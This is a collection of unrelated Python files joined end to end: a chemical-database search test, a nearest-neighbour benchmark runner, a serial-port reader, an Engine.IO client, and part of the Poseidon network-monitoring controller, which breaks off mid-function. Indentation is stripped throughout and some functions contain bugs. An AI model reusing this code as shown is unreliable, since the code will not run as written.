#outPrint('Structure {0} excluded: {1}'.format(index, getIndigoExceptionText(e)), pid, output)
wrongStructures += 1
index += 1
if index % 1000 == 0:
print('Structures inserted: {0}'.format(index))
#outPrint('Finished indexing {1} structures. {2} wrong structures excluded'.format(pid, index, wrongStructures), pid, output)
def makeSearchSim(db, pid, query, min, max, options, output=None ):
#outPrint('\n\nSimSearch with metric {0}'.format(options.encode('ascii')), pid, output)
search = db.searchSim(query, min, max, options)
cnt = 0
while search.next():
#outPrint('Mol #{0} with sim value {1}'.format(search.getCurrentId(), search.getCurrentSimilarityValue()), pid, output)
cnt = cnt + 1;
#f1=open('sim_out.txt', 'a+')
#f1.write('PID {0}) Total count in db #{1} {2}\n'.format(pid, db, cnt))
outPrint('PID {0}) Total count {1}'.format(pid, cnt), pid, output)
def makeSearchSub(db, pid, query, options, output=None):
#outPrint('\n\nSubSearch:'.format(db), pid, output)
search = db.searchSub(query, options)
cnt = 0
while search.next():
#outPrint('Mol #{0}'.format(search.getCurrentId()), pid, output)
cnt = cnt + 1
#f1=open('sub_out.txt', 'a+')
#f1.write('PID {0}) Total count in db #{1} {2}\n'.format(pid, db, cnt))
outPrint('PID {0}) Total count {1}'.format(pid, cnt), pid, output)
def makeSearchExact(db, pid, query, options, output=None):
#outPrint('ExactSearch:'.format(db), pid, output)
search = db.searchExact(query, options)
cnt = 0
while search.next():
#outPrint('Mol #{0}'.format(search.getCurrentId()), pid, output)
cnt = cnt + 1
#f1=open('./exact_out.txt', 'a+')
#f1.write('PID {0}) Total count in db #{1} {2}\n'.format(pid, db, cnt))
outPrint('PID {0}) Total count {1}'.format(pid, cnt), pid, output)
def partCreate():
bingo = Bingo.createDatabaseFile(indigo, joinPathPy('mol_part_db', __file__), 'molecule', 'mt_size:2000')
insertSmi(bingo, 0, 'sample_100000.smi')
bingo.close()
def partTest(size, type = 'sub'):
bingo = Bingo.loadDatabaseFile(indigo, joinPathPy('mol_part_db', __file__), '')
index = 0
for m in indigo.iterateSDFile(joinPathPy('molecules/rand_queries_small.sdf', __file__)):
try:
print('\nQuery #{0}'.format(index + 1))
outputs = ['' for i in range(size + 1)]
threads = []
if type == 'sub':
qmol = indigo.loadQueryMolecule(m.rawData())
threads.append(threading.Thread(target=makeSearchSub, args=(bingo, 0, qmol, '', outputs)))
for i in range(1, size + 1):
threads.append(threading.Thread(target=makeSearchSub, args=(bingo, i, qmol, 'part:{0}/{1}'.format(i, size), outputs)))
elif type == 'exact':
qmol = indigo.loadMolecule(m.rawData())
threads.append(threading.Thread(target=makeSearchExact, args=(bingo, 0, qmol, '', outputs)))
for i in range(1, size + 1):
threads.append(threading.Thread(target=makeSearchExact, args=(bingo, i, qmol, 'part:{0}/{1}'.format(i, size), outputs)))
else:
qmol = indigo.loadMolecule(m.rawData())
threads.append(threading.Thread(target=makeSearchSim, args=(bingo, 0, qmol, 0.5, 1, '', outputs)))
for i in range(1, size + 1):
threads.append(threading.Thread(target=makeSearchSim, args=(bingo, i, qmol, 0.5, 1, 'part:{0}/{1}'.format(i, size), outputs)))
for t in threads:
t.start()
for t in threads:
t.join()
for out in outputs:
print(out)
inpex = index + 1
except BingoException as e:
print('Query {0} fail: {1}'.format(getIndigoExceptionText(e)))
index += 1
bingo.close()
indigo = Indigo()
print('\n2 Database creating..\n')
partCreate()
print('\n Partial similarity search:\n')
partTest(3, 'sim')
print('\n Partial substructure search:\n')
partTest(3, 'sub')
print('\n Partial exact search:\n')
partTest(3, 'exact')
|
runner.py | import argparse
import datetime
import docker
import json
import multiprocessing.pool
import numpy
import os
import psutil
import requests
import sys
import threading
import time
import psutil
from datasketch import MinHash
import collections
from ann_benchmarks.datasets import get_dataset, DATASETS
from ann_benchmarks.algorithms.definitions import Definition, instantiate_algorithm
from ann_benchmarks.distance import metrics
from ann_benchmarks.results import store_results
def run(definition,
dataset,
count,
run_count=3,
force_single=True,
use_batch_query=False):
algo = instantiate_algorithm(definition)
D = get_dataset(dataset)
X_train = numpy.array(D['train'])
X_test = numpy.array(D['test'])
distance = D.attrs['distance']
print('got a train set of size (%d * %d)' % X_train.shape)
print('got %d queries' % len(X_test))
try:
t0 = time.time()
index_size_before = algo.get_index_size("self")
algo.fit(X_train)
build_time = time.time() - t0
index_size = algo.get_index_size("self") - index_size_before
print('Built index in', build_time)
print('Index size: ', index_size)
best_search_time = float('inf')
for i in range(run_count):
print('Run %d/%d...' % (i + 1, run_count))
# a bit dumb but can't be a scalar since of Python's scoping rules
n_items_processed = [0]
def single_query(v):
start = time.time()
candidates = algo.query(v, count)
total = (time.time() - start)
candidates = [(int(idx),
float(metrics[distance]['distance'](
v, X_train[idx]))) for idx in candidates]
n_items_processed[0] += 1
if n_items_processed[0] % 1000 == 0:
print('Processed %d/%d queries...' % (n_items_processed[0],
X_test.shape[0]))
if len(candidates) > count:
print(
'warning: algorithm %s returned %d results, but count is only %d)'
% (algo.name, len(candidates), count))
return (total, candidates)
def batch_query(X):
start = time.time()
result = algo.batch_query(X, count)
total = (time.time() - start)
candidates = [[(int(idx),
float(metrics[distance]['distance'](
v, X_train[idx])))
for idx in single_results]
for v, single_results in zip(X, results)]
return [(total / float(len(X)), v) for v in candidates]
if use_batch_query:
results = batch_query(X_test)
elif algo.use_threads() and not force_single:
pool = multiprocessing.pool.ThreadPool()
results = pool.map(single_query, X_test)
else:
p = psutil.Process()
initial_affinity = p.cpu_affinity()
# one of the available virtual CPU cores
p.cpu_affinity([initial_affinity[len(initial_affinity) // 2]])
results = [single_query(x) for x in X_test]
p.cpu_affinity(initial_affinity)
total_time = sum(time for time, _ in results)
total_candidates = sum(
len(candidates) for _, candidates in results)
search_time = total_time / len(X_test)
avg_candidates = total_candidates / len(X_test)
best_search_time = min(best_search_time, search_time)
verbose = hasattr(algo, "query_verbose")
attrs = {
"batch_mode": use_batch_query,
"build_time": build_time,
"best_search_time": best_search_time,
"candidates": avg_candidates,
"expect_extra": verbose,
"index_size": index_size,
"name": algo.name,
"run_count": run_count,
"run_alone": force_single,
"distance": distance,
"count": int(count),
"algo": definition.algorithm,
"dataset": dataset
}
store_results(dataset, count, definition, attrs, results)
finally:
algo.done()
def run_from_cmdline():
parser = argparse.ArgumentParser()
parser.add_argument('--dataset', choices=DATASETS.keys(), required=True)
parser.add_argument('--algorithm', required=True)
parser.add_argument('--module', required=True)
parser.add_argument('--constructor', required=True)
parser.add_argument('--count', required=True, type=int)
parser.add_argument('--json-args', action='store_true')
parser.add_argument('-a', '--arg', dest='args', action='append')
args = parser.parse_args()
if args.json_args:
algo_args = [json.loads(arg) for arg in args.args]
else:
algo_args = args.args
definition = Definition(
algorithm=args.algorithm,
docker_tag=None, # not needed
module=args.module,
constructor=args.constructor,
arguments=algo_args)
run(definition, args.dataset, args.count)
def run_docker(definition,
dataset,
count,
runs,
timeout=3 * 3600,
mem_limit=None):
cmd = [
'--dataset', dataset, '--algorithm', definition.algorithm, '--module',
definition.module, '--constructor', definition.constructor, '--count',
str(count), '--json-args'
]
for arg in definition.arguments:
cmd += ['--arg', json.dumps(arg)]
print('Running command', cmd)
client = docker.from_env()
if mem_limit is None:
mem_limit = psutil.virtual_memory().available
print('Memory limit:', mem_limit)
container = client.containers.run(
definition.docker_tag,
cmd,
volumes={
os.path.abspath('ann_benchmarks'): {
'bind': '/home/app/ann_benchmarks',
'mode': 'ro'
},
os.path.abspath('data'): {
'bind': '/home/app/data',
'mode': 'ro'
},
os.path.abspath('results'): {
'bind': '/home/app/results',
'mode': 'rw'
},
},
mem_limit=mem_limit,
detach=True)
def stream_logs():
import colors
for line in container.logs(stream=True):
print(colors.color(line.decode().rstrip(), fg='yellow'))
t = threading.Thread(target=stream_logs, daemon=True)
t.start()
try:
exit_code = container.wait(timeout=timeout)
# Exit if exit code
if exit_code == 0:
return
elif exit_code is not None:
raise Exception('Child process raised exception %d' % exit_code)
finally:
container.remove(force=True)
|
serial_reader.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright ยฉ 2019 ckitagawa <ckitagawa@edu.uwaterloo.ca>
#
# Distributed under terms of the MIT license.
import logging
import threading
import serial
import serial.tools.list_ports
import fiber_reading
from collections import deque
def select_device():
"""User-provided serial device selector.
Args:
None
Returns:
The selected serial device as ListPortInfo.
"""
while True:
print('Pick the serial device:')
ports = serial.tools.list_ports.comports()
for i, port in enumerate(ports):
print('{}: {}'.format(i, port))
try:
chosen_port = ports[int(input())]
print('Selected {}'.format(chosen_port))
return chosen_port
except IndexError:
print('Invalid device!')
continue
class SerialDataSource(object):
"""A datasource that reads from a bound serial port interface."""
def __init__(self, device):
self.q = deque()
self.ser = serial.Serial(device, 115200)
self.running = False
self.t = None
def start(self):
"""Starts the packet_service."""
if self.running:
return
self.running = True
self.t = threading.Thread(target=self.packet_service)
self.t.start()
def stop(self):
self.running = False
self.t.join()
self.t = None
def get_packet(self):
if self.q:
return self.q.popleft()
def packet_service(self):
# Discard the first packet
self.ser.readline().decode('ascii')
while True:
line = ''
try:
line = self.ser.readline().decode('ascii')
except Exception:
continue
if not line:
continue
ints = line.split(',')
l = len(ints)
if l < 3:
print(line)
continue
axis_char = int(ints[0])
axis = fiber_reading.Axis.UNKNOWN
if (axis_char == 0):
axis = fiber_reading.Axis.X_AXIS
elif (axis_char == 1):
axis = fiber_reading.Axis.Y_AXIS
index = int(ints[1])
callib = int(ints[2])
reading = fiber_reading.FiberReading(axis, index, callib)
for i in range(3, l):
reading.AddData(int(ints[i]))
self.q.append(reading)
|
client.py | import logging
try:
import queue
except ImportError: # pragma: no cover
import Queue as queue
import signal
import threading
import time
import six
from six.moves import urllib
try:
import urllib3
except ImportError: # pragma: no cover
urllib3 = None
try:
import websocket
except ImportError: # pragma: no cover
websocket = None
from . import exceptions
from . import packet
from . import payload
default_logger = logging.getLogger('engineio.client')
connected_clients = []
if six.PY2: # pragma: no cover
ConnectionError = OSError
def signal_handler(sig, frame):
"""SIGINT handler.
Disconnect all active clients and then invoke the original signal handler.
"""
for client in connected_clients[:]:
if client.is_asyncio_based():
client.start_background_task(client.disconnect, abort=True)
else:
client.disconnect(abort=True)
return original_signal_handler(sig, frame)
original_signal_handler = signal.signal(signal.SIGINT, signal_handler)
class Client(object):
"""An Engine.IO client.
This class implements a fully compliant Engine.IO web client with support
for websocket and long-polling transports.
:param logger: To enable logging set to ``True`` or pass a logger object to
use. To disable logging set to ``False``. The default is
``False``.
:param json: An alternative json module to use for encoding and decoding
packets. Custom json modules must have ``dumps`` and ``loads``
functions that are compatible with the standard library
versions.
"""
event_names = ['connect', 'disconnect', 'message']
def __init__(self, logger=False, json=None):
self.handlers = {}
self.base_url = None
self.transports = None
self.current_transport = None
self.sid = None
self.upgrades = None
self.ping_interval = None
self.ping_timeout = None
self.pong_received = True
self.http = None
self.ws = None
self.read_loop_task = None
self.write_loop_task = None
self.ping_loop_task = None
self.ping_loop_event = self._create_event()
self.queue = None
self.queue_empty = None
self.state = 'disconnected'
if json is not None:
packet.Packet.json = json
if not isinstance(logger, bool):
self.logger = logger
else:
self.logger = default_logger
if not logging.root.handlers and \
self.logger.level == logging.NOTSET:
if logger:
self.logger.setLevel(logging.INFO)
else:
self.logger.setLevel(logging.ERROR)
self.logger.addHandler(logging.StreamHandler())
def is_asyncio_based(self):
return False
def on(self, event, handler=None):
"""Register an event handler.
:param event: The event name. Can be ``'connect'``, ``'message'`` or
``'disconnect'``.
:param handler: The function that should be invoked to handle the
event. When this parameter is not given, the method
acts as a decorator for the handler function.
Example usage::
# as a decorator:
@eio.on('connect')
def connect_handler():
print('Connection request')
# as a method:
def message_handler(msg):
print('Received message: ', msg)
eio.send('response')
eio.on('message', message_handler)
"""
if event not in self.event_names:
raise ValueError('Invalid event')
def set_handler(handler):
self.handlers[event] = handler
return handler
if handler is None:
return set_handler
set_handler(handler)
def connect(self, url, headers={}, transports=None,
engineio_path='engine.io'):
"""Connect to an Engine.IO server.
:param url: The URL of the Engine.IO server. It can include custom
query string parameters if required by the server.
:param headers: A dictionary with custom headers to send with the
connection request.
:param transports: The list of allowed transports. Valid transports
are ``'polling'`` and ``'websocket'``. If not
given, the polling transport is connected first,
then an upgrade to websocket is attempted.
:param engineio_path: The endpoint where the Engine.IO server is
installed. The default value is appropriate for
most cases.
Example usage::
eio = engineio.Client()
eio.connect('http://localhost:5000')
"""
if self.state != 'disconnected':
raise ValueError('Client is not in a disconnected state')
valid_transports = ['polling', 'websocket']
if transports is not None:
if isinstance(transports, six.string_types):
transports = [transports]
transports = [transport for transport in transports
if transport in valid_transports]
if not transports:
raise ValueError('No valid transports provided')
self.transports = transports or valid_transports
self.queue, self.queue_empty = self._create_queue()
return getattr(self, '_connect_' + self.transports[0])(
url, headers, engineio_path)
def wait(self):
"""Wait until the connection with the server ends.
Client applications can use this function to block the main thread
during the life of the connection.
"""
if self.read_loop_task:
self.read_loop_task.join()
def send(self, data, binary=None):
"""Send a message to a client.
:param data: The data to send to the client. Data can be of type
``str``, ``bytes``, ``list`` or ``dict``. If a ``list``
or ``dict``, the data will be serialized as JSON.
:param binary: ``True`` to send packet as binary, ``False`` to send
as text. If not given, unicode (Python 2) and str
(Python 3) are sent as text, and str (Python 2) and
bytes (Python 3) are sent as binary.
"""
self._send_packet(packet.Packet(packet.MESSAGE, data=data,
binary=binary))
def disconnect(self, abort=False):
"""Disconnect from the server.
:param abort: If set to ``True``, do not wait for background tasks
associated with the connection to end.
"""
if self.state == 'connected':
self._send_packet(packet.Packet(packet.CLOSE))
self.queue.put(None)
self.state = 'disconnecting'
self._trigger_event('disconnect')
if self.current_transport == 'websocket':
self.ws.close()
if not abort:
self.read_loop_task.join()
self.state = 'disconnected'
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
def transport(self):
"""Return the name of the transport currently in use.
The possible values returned by this function are ``'polling'`` and
``'websocket'``.
"""
return self.current_transport
def start_background_task(self, target, *args, **kwargs):
"""Start a background task.
This is a utility function that applications can use to start a
background task.
:param target: the target function to execute.
:param args: arguments to pass to the function.
:param kwargs: keyword arguments to pass to the function.
This function returns an object compatible with the `Thread` class in
the Python standard library. The `start()` method on this object is
already called by this function.
"""
th = threading.Thread(target=target, args=args, kwargs=kwargs)
th.start()
return th
def sleep(self, seconds=0):
"""Sleep for the requested amount of time."""
return time.sleep(seconds)
def _reset(self):
self.state = 'disconnected'
def _connect_polling(self, url, headers, engineio_path):
"""Establish a long-polling connection to the Engine.IO server."""
if urllib3 is None: # pragma: no cover
# not installed
self.logger.error('urllib3 is not installed -- cannot make HTTP '
'requests!')
return
self.base_url = self._get_engineio_url(url, engineio_path, 'polling')
self.logger.info('Attempting polling connection to ' + self.base_url)
r = self._send_request(
'GET', self.base_url + self._get_url_timestamp(), headers=headers)
if r is None:
self._reset()
raise exceptions.ConnectionError(
'Connection refused by the server')
if r.status != 200:
raise exceptions.ConnectionError(
'Unexpected status code %s in server response', r.status)
try:
p = payload.Payload(encoded_payload=r.data)
except ValueError:
six.raise_from(exceptions.ConnectionError(
'Unexpected response from server'), None)
open_packet = p.packets[0]
if open_packet.packet_type != packet.OPEN:
raise exceptions.ConnectionError(
'OPEN packet not returned by server')
self.logger.info(
'Polling connection accepted with ' + str(open_packet.data))
self.sid = open_packet.data['sid']
self.upgrades = open_packet.data['upgrades']
self.ping_interval = open_packet.data['pingInterval'] / 1000.0
self.ping_timeout = open_packet.data['pingTimeout'] / 1000.0
self.current_transport = 'polling'
self.base_url += '&sid=' + self.sid
self.state = 'connected'
connected_clients.append(self)
self._trigger_event('connect')
for pkt in p.packets[1:]:
self._receive_packet(pkt)
if 'websocket' in self.upgrades and 'websocket' in self.transports:
# attempt to upgrade to websocket
if self._connect_websocket(url, headers, engineio_path):
# upgrade to websocket succeeded, we're done here
return
# start background tasks associated with this client
self.ping_loop_task = self.start_background_task(self._ping_loop)
self.write_loop_task = self.start_background_task(self._write_loop)
self.read_loop_task = self.start_background_task(
self._read_loop_polling)
def _connect_websocket(self, url, headers, engineio_path):
"""Establish or upgrade to a WebSocket connection with the server."""
if websocket is None: # pragma: no cover
# not installed
self.logger.warning('websocket-client package not installed, only '
'polling transport is available')
return False
websocket_url = self._get_engineio_url(url, engineio_path, 'websocket')
if self.sid:
self.logger.info(
'Attempting WebSocket upgrade to ' + websocket_url)
upgrade = True
websocket_url += '&sid=' + self.sid
else:
upgrade = False
self.base_url = websocket_url
self.logger.info(
'Attempting WebSocket connection to ' + websocket_url)
try:
ws = websocket.create_connection(
websocket_url + self._get_url_timestamp(), header=headers)
except ConnectionError:
if upgrade:
self.logger.warning(
'WebSocket upgrade failed: connection error')
return False
else:
raise exceptions.ConnectionError('Connection error')
if upgrade:
ws.send(packet.Packet(packet.PING, data='probe').encode())
pkt = packet.Packet(encoded_packet=ws.recv())
if pkt.packet_type != packet.PONG or pkt.data != 'probe':
self.logger.warning(
'WebSocket upgrade failed: no PONG packet')
return False
ws.send(packet.Packet(packet.UPGRADE).encode())
self.current_transport = 'websocket'
self.logger.info('WebSocket upgrade was successful')
else:
open_packet = packet.Packet(encoded_packet=ws.recv())
if open_packet.packet_type != packet.OPEN:
raise exceptions.ConnectionError('no OPEN packet')
self.logger.info(
'WebSocket connection accepted with ' + str(open_packet.data))
self.sid = open_packet.data['sid']
self.upgrades = open_packet.data['upgrades']
self.ping_interval = open_packet.data['pingInterval'] / 1000.0
self.ping_timeout = open_packet.data['pingTimeout'] / 1000.0
self.current_transport = 'websocket'
self.state = 'connected'
connected_clients.append(self)
self._trigger_event('connect')
self.ws = ws
# start background tasks associated with this client
self.ping_loop_task = self.start_background_task(self._ping_loop)
self.write_loop_task = self.start_background_task(self._write_loop)
self.read_loop_task = self.start_background_task(
self._read_loop_websocket)
return True
def _receive_packet(self, pkt):
"""Handle incoming packets from the server."""
packet_name = packet.packet_names[pkt.packet_type] \
if pkt.packet_type < len(packet.packet_names) else 'UNKNOWN'
self.logger.info(
'Received packet %s data %s', packet_name,
pkt.data if not isinstance(pkt.data, bytes) else '<binary>')
if pkt.packet_type == packet.MESSAGE:
self._trigger_event('message', pkt.data)
elif pkt.packet_type == packet.PONG:
self.pong_received = True
elif pkt.packet_type == packet.NOOP:
pass
else:
self.logger.error('Received unexpected packet of type %s',
pkt.packet_type)
def _send_packet(self, pkt):
"""Queue a packet to be sent to the server."""
if self.state != 'connected':
return
self.queue.put(pkt)
self.logger.info(
'Sending packet %s data %s',
packet.packet_names[pkt.packet_type],
pkt.data if not isinstance(pkt.data, bytes) else '<binary>')
def _send_request(
self, method, url, headers=None, body=None): # pragma: no cover
if self.http is None:
self.http = urllib3.PoolManager()
try:
return self.http.request(method, url, headers=headers, body=body)
except urllib3.exceptions.MaxRetryError:
pass
def _create_queue(self):
"""Create the client's send queue."""
return queue.Queue(), queue.Empty
def _create_event(self):
"""Create an event."""
return threading.Event()
def _trigger_event(self, event, *args, **kwargs):
"""Invoke an event handler."""
run_async = kwargs.pop('run_async', False)
if event in self.handlers:
if run_async:
return self.start_background_task(self.handlers[event], *args)
else:
try:
return self.handlers[event](*args)
except:
self.logger.exception(event + ' handler error')
def _get_engineio_url(self, url, engineio_path, transport):
"""Generate the Engine.IO connection URL."""
engineio_path = engineio_path.strip('/')
parsed_url = urllib.parse.urlparse(url)
if transport == 'polling':
scheme = 'http'
elif transport == 'websocket':
scheme = 'ws'
else: # pragma: no cover
raise ValueError('invalid transport')
if parsed_url.scheme in ['https', 'wss']:
scheme += 's'
return ('{scheme}://{netloc}/{path}/?{query}'
'{sep}transport={transport}&EIO=3').format(
scheme=scheme, netloc=parsed_url.netloc,
path=engineio_path, query=parsed_url.query,
sep='&' if parsed_url.query else '',
transport=transport)
def _get_url_timestamp(self):
"""Generate the Engine.IO query string timestamp."""
return '&t=' + str(time.time())
def _ping_loop(self):
"""This background task sends a PING to the server at the requested
interval.
"""
self.pong_received = True
self.ping_loop_event.clear()
while self.state == 'connected':
if not self.pong_received:
self.logger.warning(
'PONG response has not been received, aborting')
if self.ws:
self.ws.close()
self.queue.put(None)
self._reset()
break
self.pong_received = False
self._send_packet(packet.Packet(packet.PING))
self.ping_loop_event.wait(timeout=self.ping_interval)
self.logger.info('Exiting ping task')
def _read_loop_polling(self):
"""Read packets by polling the Engine.IO server."""
while self.state == 'connected':
self.logger.info(
'Sending polling GET request to ' + self.base_url)
r = self._send_request(
'GET', self.base_url + self._get_url_timestamp())
if r is None:
self.logger.warning(
'Connection refused by the server, aborting')
self.queue.put(None)
break
if r.status != 200:
self.logger.warning('Unexpected status code %s in server '
'response, aborting', r.status)
self.queue.put(None)
break
try:
p = payload.Payload(encoded_payload=r.data)
except ValueError:
self.logger.warning(
'Unexpected packet from server, aborting')
self.queue.put(None)
break
for pkt in p.packets:
self._receive_packet(pkt)
self.logger.info('Waiting for write loop task to end')
self.write_loop_task.join()
self.logger.info('Waiting for ping loop task to end')
self.ping_loop_event.set()
self.ping_loop_task.join()
if self.state == 'connected':
self._trigger_event('disconnect')
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
self.logger.info('Exiting read loop task')
def _read_loop_websocket(self):
"""Read packets from the Engine.IO WebSocket connection."""
while self.state == 'connected':
p = None
try:
p = self.ws.recv()
except websocket.WebSocketConnectionClosedException:
self.logger.warning(
'WebSocket connection was closed, aborting')
self.queue.put(None)
break
except Exception as e:
self.logger.info(
'Unexpected error "%s", aborting', str(e))
self.queue.put(None)
break
if isinstance(p, six.text_type): # pragma: no cover
p = p.encode('utf-8')
pkt = packet.Packet(encoded_packet=p)
self._receive_packet(pkt)
self.logger.info('Waiting for write loop task to end')
self.write_loop_task.join()
self.logger.info('Waiting for ping loop task to end')
self.ping_loop_event.set()
self.ping_loop_task.join()
if self.state == 'connected':
self._trigger_event('disconnect')
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
self.logger.info('Exiting read loop task')
def _write_loop(self):
"""This background task sends packages to the server as they are
pushed to the send queue.
"""
while self.state == 'connected':
packets = None
timeout = max(self.ping_interval, self.ping_timeout)
try:
packets = [self.queue.get(timeout=timeout)]
except self.queue_empty:
self.logger.error('packet queue is empty, aborting')
self._reset()
break
if packets == [None]:
self.queue.task_done()
packets = []
else:
while True:
try:
packets.append(self.queue.get(block=False))
except self.queue_empty:
break
if packets[-1] is None:
packets = packets[:-1]
self.queue.task_done()
break
if not packets:
# empty packet list returned -> connection closed
break
if self.current_transport == 'polling':
p = payload.Payload(packets=packets)
r = self._send_request(
'POST', self.base_url, body=p.encode(),
headers={'Content-Type': 'application/octet-stream'})
for pkt in packets:
self.queue.task_done()
if r is None:
self.logger.warning(
'Connection refused by the server, aborting')
self._reset()
break
if r.status != 200:
self.logger.warning('Unexpected status code %s in server '
'response, aborting', r.status)
self._reset()
break
else:
# websocket
try:
for pkt in packets:
self.ws.send(pkt.encode())
self.queue.task_done()
except websocket.WebSocketConnectionClosedException:
self.logger.warning(
'WebSocket connection was closed, aborting')
self._reset()
break
self.logger.info('Exiting write loop task')
|
poseidonMain.py | #!/usr/bin/env python
#
# Copyright (c) 2016 In-Q-Tel, Inc, All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
poseidonMain
Created on 29 May 2016
@author: dgrossman, lanhamt
rabbitmq:
host: poseidon-rabbit
exchange: topic-poseidon-internal
queue(in): poseidon_main
keys: poseidon.algos.#,poseidon.action.#
'''
import json
import logging
import logging.config
import Queue
import threading
import time
import types
from functools import partial
from os import getenv
import pika
import requests
from poseidon.poseidonMain.Config.Config import config_interface
from poseidon.poseidonMain.Investigator.Investigator import investigator_interface
from poseidon.poseidonMain.Scheduler.Scheduler import scheduler_interface
# class NullHandler(logging.Handler):
# def emit(self, record):
# pass
# h = NullHandler()
# module_logger = logging.getLogger(__name__).addHandler(h)
logging.basicConfig(level=logging.DEBUG)
module_logger = logging.getLogger(__name__)
def callback(ch, method, properties, body, q=None):
''' callback, places rabbit data into internal queue'''
module_logger.debug('got a message: {0}:{1}:{2}'.format(
method.routing_key, body, type(body)))
# TODO more
if q is not None:
q.put((method.routing_key, body))
else:
module_logger.error('posedionMain workQueue is None')
class PoseidonMain(object):
''' poseidonmain '''
def __init__(self, skip_rabbit=False):
''' poseidonMain initialization '''
self.skip_rabbit = skip_rabbit
self.rabbit_connection_local = None
self.rabbit_channel_local = None
self.rabbit_connection_vent = None
self.rabbit_channel_vent = None
self.logger = module_logger
self.logger.debug('logger started')
self.m_queue = Queue.Queue()
self.shutdown = False
self.mod_configuration = dict()
self.mod_name = self.__class__.__name__
self.config_section_name = self.mod_name
self.Investigator = investigator_interface
self.Investigator.set_owner(self)
self.Scheduler = scheduler_interface
self.Scheduler.set_owner(self)
self.Config = config_interface
self.Config.set_owner(self)
self.Config.configure()
self.Config.configure_endpoints()
self.Investigator.configure()
self.Investigator.configure_endpoints()
self.Scheduler.configure()
self.Scheduler.configure_endpoints()
self.monitoring = dict()
self.shutdown = dict()
for item in self.Config.get_section(self.config_section_name):
my_k, my_v = item
self.mod_configuration[my_k] = my_v
self.init_logging()
def init_logging(self):
''' setup the logging parameters for poseidon '''
config = None
path = getenv('loggingFile')
if path is None:
path = self.mod_configuration.get('loggingFile')
if path is not None:
with open(path, 'rt') as some_file:
config = json.load(some_file)
logging.config.dictConfig(config)
else:
logging.basicConfig(level=logging.DEBUG)
@staticmethod
def make_type_val(item):
''' normalize messages '''
endpoint = None
value = None
endpoint, value = item[0], item[1]
return endpoint, value
def start_monitor(self, ivalue):
''' start monitoring an address'''
self.logger.debug('start_monitor:{0},{1}'.format(ivalue, type(ivalue)))
r_exchange = 'topic-poseidon-internal'
r_key = 'poseidon.action.start_monitor'
r_msg = json.dumps(ivalue)
for my_hash, my_value in ivalue.iteritems():
if my_hash not in self.monitoring:
self.logger.debug(
'starting monitoring:{0}:{1}'.format(my_hash, my_value))
# TODO MSG the collector to begin waiting. contents of my_value
#
self.rabbit_channel_local.basic_publish(exchange=r_exchange,
routing_key=r_key,
body=r_msg)
self.monitoring[my_hash] = my_value
else:
self.logger.debug(
'already being monitored:{0}:{1}'.format(my_hash, my_value))
def stop_monitor(self, ivalue):
''' stop monitoring an address'''
for my_hash, my_dict in ivalue.iteritems():
if my_hash in self.monitoring:
self.monitoring.pop(my_hash)
self.logger.debug('stop_monitor:{0},{1}'.format(ivalue, type(ivalue)))
r_exchange = 'topic-poseidon-internal'
r_key = 'poseidon.action.stop_monitor'
r_msg = json.dumps(ivalue)
self.rabbit_channel_local.basic_publish(exchange=r_exchange,
routing_key=r_key,
body=r_msg)
def endpoint_shutdown(self, ivalue):
self.logger.debug('endpoint_shutdown:{0}'.format(ivalue))
''' shutdown an endpoint '''
r_exchange = 'topic-poseidon-internal'
r_key = 'poseidon.action.endpoint_shutdown'
r_msg = json.dumps(ivalue)
self.rabbit_channel_local.basic_publish(exchange=r_exchange,
routing_key=r_key,
body=r_msg)
def endpoint_allow(self, ivalue):
''' shutdown an endpoint '''
r_exchange = 'topic-poseidon-internal'
r_key = 'poseidon.action.endpoint_allow'
r_msg = json.dumps(ivalue)
self.rabbit_channel_local.basic_publish(exchange=r_exchange,
routing_key=r_key,
body=r_msg)
def check_db(self, dev_hash, field):
'''
Given a device hash and field to look for in
its record, queries the database for device record
and returns the given field. Returns None on error.
'''
try:
query = {'dev_id': dev_hash}
query_string = str(query).replace("\'", "\"")
ip = self.mod_configuration['storage_interface_ip']
port = self.mod_configuration['storage_interface_port']
uri = 'http://' + ip + ':' + port + \
'/v1/storage/query/{database}/{collection}/{query_str}'.format(
database=self.mod_configuration['database'],
collection=self.mod_configuration['collection'],
query_str=query_string)
self.logger.error('check_db:{0}:{1}'.format(uri, type(uri)))
resp = requests.get(uri)
self.logger.debug('response from db:' + resp.text)
# resp.text should load into dict 'docs' key for list of
# documents matching the query - should be only 1 match
resp = json.loads(resp.text)
if resp['count'] == 1:
db_doc = resp['docs'][0]
self.logger.debug('found db doc: ' + str(db_doc))
return db_doc[field]
else:
self.logger.debug('bad document in db: ' + str(db_doc))
except Exception, e:
self.logger.debug('failed to get record from db' + str(e))
return None
def start_vent_collector(self, dev_hash, num_captures=1):
'''
Given a device hash and optionally a number of captures
to be taken, starts vent collector for that device with the
options specified in poseidon.config.
'''
try:
payload = {'nic': self.mod_configuration['collector_nic'],
'id': dev_hash,
'interval': self.mod_configuration['collector_interval'],
'filter': self.mod_configuration['collector_filter'],
'iters': str(num_captures)}
self.logger.debug('vent payload: ' + str(payload))
vent_addr = self.mod_configuration[
'vent_ip'] + ':' + self.mod_configuration['vent_port']
uri = 'http://' + vent_addr + '/create'
resp = requests.post(uri, json=payload)
self.logger.debug('collector repsonse: ' + resp.text)
except Exception, e:
self.logger.debug('failed to start vent collector' + str(e))
@staticmethod
def just_the_hash(ivalue):
return ivalue.keys()[0]
def handle_item(self, itype, ivalue):
self.logger.debug('handle_item:{0}:{1}'.format(itype, ivalue))
# just get a string back from the ml stuff
if 'poseidon.algos.eval_dev_class' not in itype:
ivalue = json.loads(ivalue)
if itype == 'poseidon.action.shutdown':
self.logger.debug('***** shutting down')
self.shutdown = True
if itype == 'poseidon.action.new_machine':
self.logger.debug('***** new machine {0}'.format(ivalue))
# tell monitor to monitor
self.start_vent_collector(self.just_the_hash(ivalue))
self.start_monitor(ivalue)
if 'poseidon.algos.eval_dev_class' in itype:
# ivalue = classificationtype:<string>
# result form eval device classifier with
